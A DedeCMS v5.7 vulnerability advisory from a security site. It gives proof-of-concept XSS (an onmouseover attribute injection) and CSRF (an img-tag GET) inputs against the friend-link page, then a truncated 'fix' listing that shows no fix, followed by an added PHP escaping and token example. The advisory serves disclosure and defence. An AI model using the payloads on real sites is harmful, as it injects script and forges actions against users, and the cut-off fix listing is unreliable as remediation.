DedeCMS v5.7 (2013-06-07) XSS + CSRF 0day vulnerability warning - 黑吧安全网 (myhack58)

2013-07-11T00:00:00
ID MYHACK58:62201339585
Type myhack58
Reporter 佚名 (anonymous)
Modified 2013-07-11T00:00:00

Description

The member bookmark (friend link) management page has both an XSS and a CSRF flaw: the title and url parameters of dopost=addnew are stored and echoed back without escaping, and the add action is accepted from a plain GET request with no anti-forgery token.

http://localhost/dedecms/member/flink_main.php

XSS: http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test' onmouseover=alert(1);'&url=test' onmouseover=alert(1);'

CSRF: <img src="http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test&url=test">

Temporary fix (the affected function in member/flink_main.php; the listing below is cut short after the opening of the item markup):

function GetLinkList(&$dsql)
{
    global $cfg_ml;
    // Only list the links belonging to the logged-in member
    $dsql->SetQuery("SELECT * FROM #@__member_flink WHERE mid='".$cfg_ml->M_ID."' ORDER BY aid DESC");
    $dsql->Execute();
    $j = 0;
    while($row = $dsql->GetArray())
    {
        $j++;
        $line = "
        <div class='item flink'>
        <div class='itemHead' >
        <div class='fRight'>
        <span class='itemDigg'><a href='#' />";
        echo $line;
    }
    if($j == 0)
    {
        echo "no links";
    }
}
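The two defects described above are fixed by output escaping and by refusing state changes that do not carry a per-session token. The following is an added, stand-alone PHP example illustrating both; it is not DedeCMS code and not the advisory's own fix. The function names (csrf_token, csrf_check, safe_link_url, h, render_link, handle_addnew) and the in-memory $links store are hypothetical; only the request parameters dopost, title and url come from the advisory.

```php
<?php
// Added example (not DedeCMS code): output escaping plus a CSRF token check
// for a "friend link" add/list handler of the flink_main.php?dopost=addnew kind.
// All function names are hypothetical; links are kept in an array instead of
// the #@__member_flink table so the script runs from the command line.

if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

// Issue one random token per session; the add-link form embeds it as a hidden field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A state change is accepted only as a POST whose token matches the session's.
// A GET triggered by an <img src=...> tag therefore fails here.
function csrf_check(string $method, ?string $token): bool
{
    if ($method !== 'POST' || $token === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $token);
}

// Accept only absolute http(s) URLs for href; javascript:, data: and junk are dropped.
function safe_link_url(string $url): ?string
{
    $url = trim($url);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// Escape for HTML text and attribute context. ENT_QUOTES also encodes the
// single quote, which the advisory's payload uses to break out of href='...'.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Render one link item with every user-controlled value escaped.
function render_link(array $row): string
{
    $url  = safe_link_url($row['url']);
    $href = $url === null ? '#' : h($url);
    return "<div class='item flink'><a href='" . $href . "'>" . h($row['title']) . "</a></div>\n";
}

// dopost=addnew handler: CSRF check first, then store the raw values
// (escaping is done at output time, not at storage time).
function handle_addnew(string $method, array $post, array &$store): string
{
    if (!csrf_check($method, $post['token'] ?? null)) {
        return "csrf check failed\n";
    }
    $store[] = [
        'title' => (string) ($post['title'] ?? ''),
        'url'   => (string) ($post['url'] ?? ''),
    ];
    return "saved\n";
}

// Constructed demo input using the advisory's payload.
$links = [];
$xss   = "test' onmouseover=alert(1);'";

// 1. The CSRF-style request: GET with no token, so it is rejected.
echo handle_addnew('GET', ['title' => 'test', 'url' => 'test'], $links);

// 2. A legitimate form submission carrying the session token is stored.
echo handle_addnew('POST', ['token' => csrf_token(), 'title' => $xss, 'url' => $xss], $links);

// 3. On output the quote is encoded, so no attribute breakout occurs, and
//    the url value is not a valid http(s) URL, so href falls back to '#'.
foreach ($links as $row) {
    echo render_link($row);
}
```

The escaping belongs in the listing code (the GetLinkList analogue), not in the input filter: stored values may reach other templates later, and escaping at every HTML sink is what actually closes the XSS. Checking the token plus the request method closes the CSRF independently of the escaping.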